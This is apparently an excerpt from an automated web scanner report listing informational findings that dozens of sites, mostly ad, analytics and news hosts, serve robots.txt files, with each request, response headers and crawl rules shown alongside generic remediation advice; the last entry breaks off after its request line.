http://usa.kaspersky.com/
http://users.techtarget.com/registration/searchsecurity/InlineRegister.page
http://www.blogger.com/dyn-css/authorization.css
http://www.cloudscan.me/2010/12/usakaperskycom-cross-site-scripting-xss.html
http://www.computerworld.com/resources/styles/general.css
http://www.etracker.de/cnt.php
http://www.facebook.com/plugins/like.php
http://www.google-analytics.com/__utm.gif
http://www.googleadservices.com/pagead/conversion/1049525132/
http://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html
http://www.kaspersky.com/
http://www.lexjansen.com/virus/
http://www.linkedin.com/countserv/count/share
http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
http://www.spamfighter.com/News-16694-Skype-Vulnerability-Makes-End-Users-Susceptible-to-Malware-Execution.htm
http://www.whatisnetwork.com/news-events/114520/kaspersky-website-vulnerable-to-xss.html
http://www.widgetserver.com/syndication/get_widget.js

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

22.1. http://a.dlqm.net/adscgen/log_error.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.dlqm.net
Path:	/adscgen/log_error.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.dlqm.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:59:38 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "200515ce-1a-f999c240"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=120, max=995
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

22.2. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

22.3. http://account.theregister.co.uk/register/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://account.theregister.co.uk
Path:	/register/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: account.theregister.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:59:42 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Wed, 22 Dec 2010 11:36:36 GMT
ETag: "7a8897-63-497fe2a6b3900"
Accept-Ranges: bytes
Content-Length: 99
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /unsubscribe/conf/
Disallow: /conf/
Disallow: /reset/
Disallow: /reminder/

22.4. http://action.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://action.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: action.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"36-1307635301000"
Last-Modified: Thu, 09 Jun 2011 16:01:41 GMT
Content-Type: text/plain
Content-Length: 36
Date: Sun, 04 Sep 2011 12:18:53 GMT
Connection: close

# go away
User-agent: *
Disallow: /

22.5. http://ad-apac.doubleclick.net/adj/scmagazine/webclient previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-apac.doubleclick.net
Path:	/adj/scmagazine/webclient

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad-apac.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sun, 04 Sep 2011 13:59:41 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

22.6. http://ad-emea.doubleclick.net/N6514/jump/uk/uk-security previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/N6514/jump/uk/uk-security

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 16:31:04 GMT
Date: Sun, 04 Sep 2011 13:59:43 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

22.7. http://ad.doubleclick.net/N6978/jump/reg_security/malware previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/N6978/jump/reg_security/malware

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sun, 04 Sep 2011 13:59:44 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

22.8. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 12:19:18 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 12:19:18 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

22.9. http://adclick.g.doubleclick.net/aclk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adclick.g.doubleclick.net
Path:	/aclk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adclick.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 13:59:52 GMT
Server: AdClickServer
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

22.10. https://adwords.google.com/um/StartNewLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/um/StartNewLogin

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 13:59:53 GMT
Expires: Sun, 04 Sep 2011 13:59:53 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /support/
Disallow: /

User-Agent: Googlebot
Allow: /
Allow: /support/
Disallow: /*?

22.11. http://amch.questionmarket.com/adsc/d921286/4/931683/adscout.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d921286/4/931683/adscout.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:16:23 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0610677-1a-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5, max=755
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

22.12. http://api.addthis.com/oexchange/0.8/forward/email/offer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.addthis.com
Path:	/oexchange/0.8/forward/email/offer

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.addthis.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"54-1308763655000"
Last-Modified: Wed, 22 Jun 2011 17:27:35 GMT
Content-Type: text/plain
Content-Length: 54
Date: Sun, 04 Sep 2011 13:59:54 GMT
Connection: close

User-agent: *
Disallow: /share/
Disallow: /oexchange/

22.13. http://api.twitter.com/1/SCMagazineAU/lists/infosec/statuses.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/SCMagazineAU/lists/infosec/statuses.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:13:32 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 12:13:32 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.14. https://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:59:55 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 13:59:55 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.15. http://apnxscm.ac3.msn.com:81/CACMSH.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apnxscm.ac3.msn.com:81
Path:	/CACMSH.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: apnxscm.ac3.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Expires: Mon, 05 Sep 2011 12:49:12 GMT
Last-Modified: Sat, 02 Apr 2011 00:47:24 GMT
Accept-Ranges: bytes
ETag: "1CBF0CF87F3F600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 04 Sep 2011 12:49:12 GMT
Connection: close
Content-Length: 70

# Keep all robots out of entire web site
User-agent: *
Disallow: /

22.16. http://at.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/ads/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:19:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Tue, 06 Sep 2011 12:19:11 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.17. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 05 Sep 2011 12:13:05 GMT
Date: Sun, 04 Sep 2011 12:13:05 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

22.18. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 05 Sep 2011 12:15:14 GMT
Date: Sun, 04 Sep 2011 12:15:14 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

22.19. http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.computerworld.com
Path:	/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blogs.computerworld.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:15:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 10 Jun 2011 15:40:34 GMT
ETag: "c4008-371-4a55d63ef2080"
Accept-Ranges: bytes
Content-Length: 881
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 12:15:44 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Crawl-Delay: 60
Request-rate: 1/10
Visit-time: 2200-1100
# All other robots
# Directories
Disallow: /database/
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /sites/
...[SNIP]...

22.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 04 Sep 2011 12:13:17 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

22.21. http://buy.norton.com/ps_ant_de_de_eset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/ps_ant_de_de_eset

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: buy.norton.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 14:00:00 GMT
Content-Length: 34
Content-Type: text/html
X-Powered-By: Servlet/2.5 JSP/2.1

User-agent: *
<br>Disallow: /
<br>

22.22. http://cdn.widgetserver.com/syndication/subscriber/Main.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.widgetserver.com
Path:	/syndication/subscriber/Main.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.widgetserver.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 12:16:53 GMT
ETag: "39-493c9a1e9b440"
Last-Modified: Fri, 29 Oct 2010 23:15:21 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: ECS (sjo/5238)
X-Cache: HIT
X-WBX: web15
Content-Length: 57
Connection: close

User-agent: *
Allow: /syndication/index.html
Disallow: /

22.23. http://clients1.google.com/complete/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clients1.google.com
Path:	/complete/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clients1.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 14:00:02 GMT
Expires: Sun, 04 Sep 2011 14:00:02 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.24. http://clk.atdmt.com/MRT/go/341816816/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/MRT/go/341816816/direct

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 101
Content-Type: text/html
Date: Sun, 04 Sep 2011 14:00:03 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

22.25. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 14:00:04 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

22.26. http://code.google.com/apis/custom-search-ads/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.google.com
Path:	/apis/custom-search-ads/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: code.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Language,Cookie,Referer
Content-Type: text/plain; charset=ISO-8859-1
ETag: "d6024b2de2848b59feb3d62ffb1df32c"
Last-Modified: Sat, 18 Dec 2010 23:18:15 GMT
Date: Sun, 04 Sep 2011 14:00:06 GMT
Expires: Sun, 04 Sep 2011 15:00:06 GMT
Cache-Control: public, max-age=3600
X-Content-Type-Options: nosniff
Server: codesite_static_content
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

User-agent: *
Disallow: /p/*/issues/csv
Disallow: /p/*/source/diff
Disallow: /a/
Allow: /a/eclipselabs.org/
Allow: /a/apache-extras.org/
Disallow: /a/*/p/*/issues/csv
Disallow: /a/*/p/*/source/diff
Cr
...[SNIP]...

22.27. http://corsec.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://corsec.com
Path:	/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: corsec.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:06 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 19:37:47 GMT
ETag: "6b8e74-18a-47790becdd8c0"
Accept-Ranges: bytes
Content-Length: 394
X-Powered-By: PleskLin
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
D
...[SNIP]...

22.28. http://devirusare.com/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://devirusare.com
Path:	/x26amp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: devirusare.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.8
Vary: Cookie
X-Pingback: http://devirusare.com/xmlrpc.php
Set-Cookie: bb2_screener_=1315144811+50.23.123.106; path=/
Set-Cookie: WPS_return_count=5; expires=Mon, 03-Sep-2012 14:00:11 GMT; path=/
Set-Cookie: wpgb_visit_last_php-default=1315144811; expires=Mon, 03-Sep-2012 14:00:11 GMT; path=/
Connection: close
Content-Type: text/plain; charset=UTF-8

# This virtual robots.txt file was created by the PC Robots.txt WordPress plugin.
# For more info visit: http://petercoughlin.com/robotstxt-wordpress-plugin/

User-agent: Alexibot
Disallow: /

User
...[SNIP]...

22.29. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:08 GMT
Server: Apache
Last-Modified: Sat, 03 Sep 2011 01:08:38 GMT
Accept-Ranges: bytes
Content-Length: 599
Vary: Accept-Encoding
X-Digg-Time: D=242 (null)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Keep-Alive: timeout=5, max=10000
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ad/*
Disallow: /ajax/*
Disallow: /error/*
Disallow: /onboard/*
Disallow: /saved
Disallow: /settings
Disallow: /settings/*
Disallow: /news/*/v/*
Disallow: /verification/*

User
...[SNIP]...

22.30. http://dna1.mookie1.com/n/97164/98396/www.bp.com/92rpd6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dna1.mookie1.com
Path:	/n/97164/98396/www.bp.com/92rpd6

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dna1.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:12 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 10 Dec 2010 04:06:03 GMT
ETag: "147004f-1a-7907e0c0"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

22.31. https://docs.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://docs.google.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 14:00:15 GMT
Expires: Sun, 04 Sep 2011 14:00:15 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /$
Allow: /support/
Allow: /a/
Allow: /Doc
Allow: /View
Allow: /ViewDoc
Allow: /present
Allow: /Present
Allow: /TeamPresent
Allow: /EmbedSlideshow
Allow: /templates
Allow: /previe
...[SNIP]...

22.32. https://drh.img.digitalriver.com/store previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://drh.img.digitalriver.com
Path:	/store

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: drh.img.digitalriver.com

Response

HTTP/1.0 200 OK
ETag: "49-3ebbc10b"
Content-Type: text/plain
Last-Modified: Fri, 09 May 2003 14:54:03 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=0+0;age=0;ecid=94643838326,0)
Content-Length: 73
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app59
Accept-Ranges: bytes
Date: Sun, 04 Sep 2011 14:00:15 GMT
Connection: close

User-agent: Ultraseek
Disallow: /
User-agent: Inktomi Search
Disallow: /

22.33. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_4_2/StdBanner.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.serving-sys.com
Path:	/BurstingCachedScripts//SBTemplates_2_4_2/StdBanner.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 13:19:41 GMT
Server: Microsoft-IIS/6.0
Date: Sun, 04 Sep 2011 12:13:23 GMT
Content-Length: 28
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

22.34. http://en.wikipedia.org/wiki/Website#Product-_or_service-based_sites/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://en.wikipedia.org
Path:	/wiki/Website#Product-_or_service-based_sites/x26amp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: en.wikipedia.org

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 13:55:28 GMT
Server: Apache
Cache-Control: s-maxage=3600, must-revalidate, max-age=0
X-Article-ID: 19292575
X-Language: en
X-Site: wikipedia
Last-Modified: Thu, 30 Jun 2011 23:13:05 GMT
Vary: Accept-Encoding
Content-Length: 27355
Content-Type: text/plain; charset=utf-8
Age: 290
X-Cache: HIT from sq66.wikimedia.org
X-Cache-Lookup: HIT from sq66.wikimedia.org:3128
X-Cache: MISS from sq78.wikimedia.org
X-Cache-Lookup: MISS from sq78.wikimedia.org:80
Connection: close

#
# robots.txt for http://www.wikipedia.org/ and friends
#
# Please note: There are a lot of pages on this site, and there are
# some misbehaved spiders out there that go _way_ too fast. If you're
# i
...[SNIP]...

22.35. http://fls.doubleclick.net/activityj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityj

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 14:00:17 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

22.36. http://forms.theregister.co.uk/mail_author/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forms.theregister.co.uk
Path:	/mail_author/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: forms.theregister.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:00:18 GMT
Server: Apache/2.2.16 (Debian) PHP/5.2.6-1+lenny12 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.0
Vary: Host,Accept-Encoding
Last-Modified: Thu, 16 Dec 2010 18:53:37 GMT
ETag: "78c169-26-4978b9243ae40"
Accept-Ranges: bytes
Content-Length: 38
Content-Type: text/plain
Connection: close

User-agent: *
Disallow: /mail_author/

22.37. http://forum.kaspersky.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.kaspersky.com
Path:	/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: forum.kaspersky.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 14:00:25 GMT
Content-Type: text/plain
Content-Length: 368
Last-Modified: Tue, 18 Sep 2007 13:07:06 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /uploads/
Disallow: /admin/
Disallow: /cache/
Disallow: /converge_local/
Disallow: /install/
Disallow: /ips_kernel/
Disallow: /jscripts/
Disallow: /modules/
Disallow: /resource
...[SNIP]...

22.38. http://gcm.netmng.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gcm.netmng.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gcm.netmng.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 12:45:01 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 22 Nov 2010 16:01:30 GMT
ETag: "62573-1a-495a65e892a80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.39. https://github.com/mojombo/jekyll/wiki/sites+sites/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://github.com
Path:	/mojombo/jekyll/wiki/sites+sites/x26amp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: github.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Sun, 04 Sep 2011 14:00:22 GMT
Content-Type: text/plain
Content-Length: 2341
Last-Modified: Tue, 19 Jul 2011 01:58:28 GMT
Connection: close
Accept-Ranges: bytes

# If you would like to crawl GitHub contact us at support@github.com.
# We also provide an extensive API: http://developer.github.com/

User-agent: baiduspider
Disallow: /tarball/
Disallow: /zipball/

...[SNIP]...

22.40. http://go.techtarget.com/clicktrack-r/activity/activity.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://go.techtarget.com
Path:	/clicktrack-r/activity/activity.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: go.techtarget.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "E45m7dih85d"
Last-Modified: Thu, 28 Jul 2011 22:21:56 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 64
Date: Sun, 04 Sep 2011 12:15:16 GMT

# all web spiders - block whole site

User-agent: *
Disallow: /

22.41. http://idgenterprise.112.2o7.net/b/ss/computerworldcom/1/H.20.3/s25338357510045 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idgenterprise.112.2o7.net
Path:	/b/ss/computerworldcom/1/H.20.3/s25338357510045

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
